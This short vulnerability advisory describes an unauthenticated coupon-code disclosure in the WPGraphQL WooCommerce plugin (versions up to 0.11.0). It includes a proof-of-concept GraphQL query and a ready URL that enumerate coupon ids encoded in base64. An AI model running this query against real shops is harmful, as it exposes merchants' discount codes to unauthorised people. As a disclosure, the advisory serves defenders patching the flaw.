WPGraphQL WooCommerce <= 0.11.0 - Unauthenticated Coupon Codes Disclosure

The plugin does not prevent unauthenticated attackers from enumerating a shop’s coupon codes and values via GraphQL.

PoC

The vulnerability exists due to the plugin only preventing users from leaking coupons using the “coupons” aggregate field, and not the regular “coupon” field. Given a valid coupon id, any unauthenticated user can make this GraphQL call and get the coupon code associated with it. Please note that the coupon ids are in the format - base64(shop_coupon:x), where x is just a 2-3 digit integer and hence easy to enumerate. query{ coupon(id:“c2hvcF9jb3Vwb246MTk=”){ amount code } } Final URL should look like this: http://vulnerable-site.tld/graphql?query=query{coupon(id:“c2hvcF9jb3Vwb246MTIz”){amount code}}